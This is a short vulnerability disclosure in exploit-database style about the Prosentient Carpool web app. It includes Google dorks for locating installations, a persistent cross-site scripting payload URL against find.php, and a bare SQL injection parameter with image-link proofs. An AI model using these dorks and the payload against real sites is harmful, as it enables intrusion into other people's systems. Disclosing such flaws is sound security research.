-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: Carpool Web App  Persistent Cross-Site Scripting - Sql Injection Vulnerability 
# Date: 29/06/2019
# Url Vendor: http://www.prosentient.com.au/
# Vendor Name: Prosentient
# Version: 1.0
# Author: TaurusOmar  
# Tiwtter: @TaurusOmar_
# Email: servicios@taurusomar.com
# Home:  https://taurusomar.com/
# Tested On: Parrot Security OS
# Risk: Medium
# Dork: intext:"Powered by Prosentient Systems"
# Dork: intext:"COPYRIGHT © 2015 CCAI & DPTI"

# Carpool systems

Carpool by Prosentient Systems is an efficient and eco-friendly system that connects drivers and passengers to save money, make new acquaintances and help the environment. This service was first commissioned to meet the needs of the NSW Ministry of Transport. But we are experts at hosting both corporate and government systems. It is a practical way of sharing transport costs and reducing road congestion and vehicle pollution, and is already operating in a number of local government areas in Australia, and is also available in the United Kingdom. 

---------------------------------
+      CROSS SITE SCRIPTING     + 
---------------------------------
# Exploiting Description - Persistent Cross-Site Scripting 
http://site.com/find.php?from=">><img src=x onerror=confirm("TaurusOmar")>


# Proof Concept
https://i.imgur.com/kYd9xHX.png

------------------------
+    SQL INJECTION     +
------------------------
# Exploiting Description - Sql Injection  
http://site.com/find.php?from= [Sqli]

#Proof Concept
https://i.imgur.com/A9kFXy2.png